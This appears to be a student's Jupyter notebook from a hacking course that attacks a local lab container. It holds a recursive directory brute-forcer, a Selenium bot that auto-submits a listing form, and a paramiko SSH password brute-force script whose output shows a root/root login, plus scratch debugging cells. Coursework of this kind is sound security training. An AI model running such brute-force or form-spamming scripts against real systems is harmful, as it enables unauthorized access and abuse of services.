In [3]:
import queue
import threading
import os
import requests
from urllib.request import urlopen, Request
from urllib.error import HTTPError
from bs4 import BeautifulSoup
import wget
from urllib import request
import urllib.request, urllib.error, urllib.parse
import re
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import time
from selenium.webdriver.common.by import By


In [7]:
class MySpider():
    def __init__(self):
        pass
        
    def mygobuster(self,target):
        wordlist = [a.strip() for a in open("wordlist.txt")]
        filters = [".html",".css","jpg", "",".js",".md",".png"]
        html = open("html.txt", "a+") 
        for word in wordlist:
            for f in filters:
                url = target+word+f
                re = requests.head(url)

                if re.status_code==301 or re.status_code==401:
                    print("Directory found: ", re.url, re.status_code)
                    newurl = re.url+"/"
                    
                    self.mygobuster(newurl)

                elif re.status_code==200:
                    print("Found: ", re.url, re.status_code)
                    response = urllib.request.urlopen(url)
                    if ".html" in re.url:
                        html.write(re.url+"\n")
                    try:
                        Content = response.read().decode('utf-8')
                        f = open("found/"+str(re.url).replace("/",""), 'w+')
                        f.write(Content)
                        f.close()
                    except:
                        Content = response.read()
                        f = open("found/"+str(re.url).replace("/",""), 'wb+')
                        f.write(Content)
                        f.close()
                else:
                    continue

    def CSSbuster(self, target):
        r  = requests.get(" http://172.17.0.2:1337/stylesheet.css")
        data = r.text
        l = []
        for i in re.findall('url\(([^)]+)\)',data):
            l.append(i)
        s = [x[2:].strip('""') for x in l[:2]]
        for j in s:
            response = urllib.request.urlopen(target+j)
            if response.code==200:
                print("Picture found:", target+j)
                con = response.read()
                f = open("found/"+str(response.url).replace("/",""), 'wb+')
                f.write(con)
            else:
                pass
    
    
    def myBot(self):
        
        s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')
        browser = webdriver.Firefox(service=s)
        for url in open("html.txt")[::-1]:
            if url=="http://172.17.0.2:1337/biete.html\n":
                browser.get(url)
                eingabe = browser.find_element(By.ID,"ort")
                eingabe.send_keys("Salzburg")
                time.sleep(1)
                eingabe2 = browser.find_element(By.ID,"preis")
                eingabe2.send_keys("1500")
                time.sleep(1)
                eingabe2 = browser.find_element(By.ID,"zimmer")
                eingabe2.send_keys("5")
                time.sleep(1)
                eingabe3 = browser.find_element(By.ID,"flaeche")
                eingabe3.send_keys("500")
                time.sleep(1)
                eingabe4 = browser.find_element(By.ID,"kontakt")
                eingabe4.send_keys("Mori.r@web.de")
                time.sleep(1)

                ein = browser.find_element(By.ID,"saveimmoButton")
                ein.click()
                time.sleep(1)
            browser.get(url)
            time.sleep(1)


In [5]:
S = MySpider()
S.mygobuster("http://172.17.0.2:1337/")
S.CSSbuster("http://172.17.0.2:1337/")

Directory found:  http://172.17.0.2:1337/data 301
Directory found:  http://172.17.0.2:1337/data/about 301
Found:  http://172.17.0.2:1337/data/about/index.html 200
Directory found:  http://172.17.0.2:1337/data/faq 301
Found:  http://172.17.0.2:1337/data/faq/index.html 200
Directory found:  http://172.17.0.2:1337/data/impressum 301
Found:  http://172.17.0.2:1337/data/impressum/index.html 200
Directory found:  http://172.17.0.2:1337/data/datenschutz 301
Found:  http://172.17.0.2:1337/data/datenschutz/index.html 200
Directory found:  http://172.17.0.2:1337/data/about 301
Found:  http://172.17.0.2:1337/data/about/index.html 200
Directory found:  http://172.17.0.2:1337/data/impressum 301
Found:  http://172.17.0.2:1337/data/impressum/index.html 200
Directory found:  http://172.17.0.2:1337/img 301
Directory found:  http://172.17.0.2:1337/img/background-images 301
Found:  http://172.17.0.2:1337/about.html 200
Found:  http://172.17.0.2:1337/index.html 200
Found:  http://172.17.0.2:1337/biete.htm

**Selenium**

In [37]:
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import time
from selenium.webdriver.common.by import By

In [12]:
s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')
browser = webdriver.Firefox(service=s)
url = 'http://172.17.0.2:1337/biete.html'
#driver = webdriver.Firefox(executable_path="/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver")
browser.get(url)
time.sleep(2)

In [23]:
def myBot():
    s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')
    browser = webdriver.Firefox(service=s)
    for url in open("html.txt"):
        if url=="http://172.17.0.2:1337/biete.html\n":
            browser.get(url)
            eingabe = browser.find_element(By.ID,"ort")
            eingabe.send_keys("Salzburg")
            time.sleep(1)
            eingabe2 = browser.find_element(By.ID,"preis")
            eingabe2.send_keys("1500")
            time.sleep(1)
            eingabe2 = browser.find_element(By.ID,"zimmer")
            eingabe2.send_keys("5")
            time.sleep(1)
            eingabe3 = browser.find_element(By.ID,"flaeche")
            eingabe3.send_keys("500")
            time.sleep(1)
            eingabe4 = browser.find_element(By.ID,"kontakt")
            eingabe4.send_keys("Mori.r@web.de")
            time.sleep(1)

            ein = browser.find_element(By.ID,"saveimmoButton")
            ein.click()
            time.sleep(1)
        browser.get(url)
        time.sleep(1)
        

In [24]:
myBot()

In [70]:
import urllib3

**SSH Angriff**

In [5]:
import sys
import paramiko
from collections import deque
import sys

In [1]:
import sys
import paramiko
from collections import deque
import queue
import sys
import paramiko
import time

def attackssh(ip):
    try:
        global que
        if len(que)==0:
            print("Not found, maybe try a new wordlist?!")
            return 1
        print("Attacking ssh.....")
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        for line in range(len(que)):
            [username, password] = que.popleft().strip().split()
            try:
                print(f"Trying with {username} {password}")
                print(len(que))
                conn = ssh.connect(ip, username=username,password=password)
                if conn is None:
                    print(f"Successfully Authenticated with {username} {password}")
                    sys.exit()
            
            except paramiko.AuthenticationException:
                print("Failed!")
                attackssh("172.17.0.2")
            
            except paramiko.SSHException:
                attackssh("172.17.0.2")
                
    except NameError:
        que = deque()
        for word in open("sshwordlist.txt", "r").readlines():
            que.append(word)
        attackssh("172.17.0.2")        
        

In [2]:
attackssh("172.17.0.2")        


Attacking ssh.....
Trying with admin password
20
Failed!
Attacking ssh.....
Trying with root toor
19
Failed!
Attacking ssh.....
Trying with admin admin
18
Failed!
Attacking ssh.....
Trying with server admin
17
Failed!
Attacking ssh.....
Trying with sinus cosinus
16
Failed!
Attacking ssh.....
Trying with tangens riebert
15
Failed!
Attacking ssh.....
Trying with supp woritz
14
Failed!
Attacking ssh.....
Trying with win noch
13
Failed!
Attacking ssh.....
Trying with admin password
12
Failed!
Attacking ssh.....
Trying with root toor
11
Failed!
Attacking ssh.....
Trying with admin admin
10
Failed!
Attacking ssh.....
Trying with server admin
9
Failed!
Attacking ssh.....
Trying with sinus cosinus
8
Failed!
Attacking ssh.....
Trying with tangens riebert
7
Failed!
Attacking ssh.....
Trying with supp woritz
6
Failed!
Attacking ssh.....
Trying with win noch
5


Exception (client): Error reading SSH protocol banner
Traceback (most recent call last):
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py", line 2278, in _check_banner
    buf = self.packetizer.readline(timeout)
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py", line 380, in readline
    buf += self._read_timeout(timeout)
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py", line 609, in _read_timeout
    raise EOFError()
EOFError

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py", line 2101, in run
    self._check_banner()
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py", line 2283, in _check_banner
    "Error reading SSH protocol banner" + str(e)
paramiko.ssh_exception.SSHException: Error reading SSH protocol banner



Failed!
Attacking ssh.....
Trying with wier und
4
Failed!
Attacking ssh.....
Trying with wolle wunktion
3
Failed!
Attacking ssh.....
Trying with wier und
2
Attacking ssh.....
Trying with wolle wunktion
1


ERROR:root:Internal Python error in the inspect module.
Below is the traceback from this internal error.



Failed!
Attacking ssh.....
Trying with root root
0
Successfully Authenticated with root root
Traceback (most recent call last):
  File "/tmp/ipykernel_374197/3788288025.py", line 12, in attackssh
    if len(que)==0:
NameError: name 'que' is not defined

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/tmp/ipykernel_374197/3788288025.py", line 23, in attackssh
    conn = ssh.connect(ip, username=username,password=password)
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/client.py", line 446, in connect
    passphrase,
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/client.py", line 766, in _auth
    raise saved_exception
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/client.py", line 753, in _auth
    self._transport.auth_password(username, password)
  File "/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py", line 1571, in auth_password
    

TypeError: object of type 'NoneType' has no len()

In [3]:
que

deque([])

In [5]:
cat sshwordlist.txt

admin password
root toor
admin admin
server admin
sinus cosinus
tangens riebert
supp woritz
win noch
wier und
wolle wunktion
root root


In [2]:
from collections import deque

In [37]:
queue = []

In [36]:
queue.append()

AttributeError: module 'queue' has no attribute 'append'

In [6]:
s.popleft()

IndexError: pop from an empty deque

In [6]:
s.append(1)

In [7]:
len(s)

1

In [28]:
if not d:
    print("hi")
else:
    print("du")

NameError: name 'd' is not defined

In [21]:
global ö

In [40]:
def rec():
    try:
        global l
        print(l)
        return
    except NameError:
        l = 1
        rec()

In [14]:
ö = 1

In [22]:
ö

1

In [54]:
l = 1

In [53]:
print(l)

1


In [3]:
q = deque()
for i in open("sshwordlist.txt").readlines():
    q.append(i)
    #[username, password] = s[i].strip().split()
    


In [4]:
from collections import deque

In [6]:

len(q)

31

In [18]:
for i in range(len(q)):
    print(q.popleft())
    print(q)

admin password

deque(['root toor\n', 'admin admin\n', 'server admin\n', 'sinus cosinus\n', 'tangens riebert\n', 'supp woritz\n', 'win noch\n', 'wier und\n', 'wolle wunktion\n', 'admin password\n', 'root toor\n', 'admin admin\n', 'server admin\n', 'sinus cosinus\n', 'tangens riebert\n', 'supp woritz\n', 'win noch\n', 'wier und\n', 'wolle wunktion\n', 'admin password\n', 'root toor\n', 'admin admin\n', 'server admin\n', 'sinus cosinus\n', 'tangens riebert\n', 'supp woritz\n', 'win noch\n', 'wier und\n', 'wolle wunktion\n', 'root root\n'])
root toor

deque(['admin admin\n', 'server admin\n', 'sinus cosinus\n', 'tangens riebert\n', 'supp woritz\n', 'win noch\n', 'wier und\n', 'wolle wunktion\n', 'admin password\n', 'root toor\n', 'admin admin\n', 'server admin\n', 'sinus cosinus\n', 'tangens riebert\n', 'supp woritz\n', 'win noch\n', 'wier und\n', 'wolle wunktion\n', 'admin password\n', 'root toor\n', 'admin admin\n', 'server admin\n', 'sinus cosinus\n', 'tangens riebert\n', 'supp woritz\

In [17]:
for i in range(len(q)):
    if len(q)==0:
        print("Not found")
        break
    print(q[i])
    q.popleft()


admin password

admin admin

sinus cosinus

supp woritz

wier und

admin password

admin admin

sinus cosinus

supp woritz

wier und

admin password

admin admin

sinus cosinus

supp woritz

wier und

root root



IndexError: deque index out of range

In [18]:
for i in range(len(q)):
        j = len(q)
        for k in range(j):
            print(k,len(q))
            #print(q)
            print(q[i])
        q.popleft()


0 15
supp woritz

1 15
supp woritz

2 15
supp woritz

3 15
supp woritz

4 15
supp woritz

5 15
supp woritz

6 15
supp woritz

7 15
supp woritz

8 15
supp woritz

9 15
supp woritz

10 15
supp woritz

11 15
supp woritz

12 15
supp woritz

13 15
supp woritz

14 15
supp woritz

0 14
wier und

1 14
wier und

2 14
wier und

3 14
wier und

4 14
wier und

5 14
wier und

6 14
wier und

7 14
wier und

8 14
wier und

9 14
wier und

10 14
wier und

11 14
wier und

12 14
wier und

13 14
wier und

0 13
admin password

1 13
admin password

2 13
admin password

3 13
admin password

4 13
admin password

5 13
admin password

6 13
admin password

7 13
admin password

8 13
admin password

9 13
admin password

10 13
admin password

11 13
admin password

12 13
admin password

0 12
admin admin

1 12
admin admin

2 12
admin admin

3 12
admin admin

4 12
admin admin

5 12
admin admin

6 12
admin admin

7 12
admin admin

8 12
admin admin

9 12
admin admin

10 12
admin admin

11 12
admin admin

0 11
sinus cosinu

IndexError: deque index out of range

In [19]:
s

deque(['admin password\n', 'root toor\n', 'admin admin\n', 'root root\n'])

In [6]:
from queue import Queue

In [ ]:
q = Queue(maxsize = len())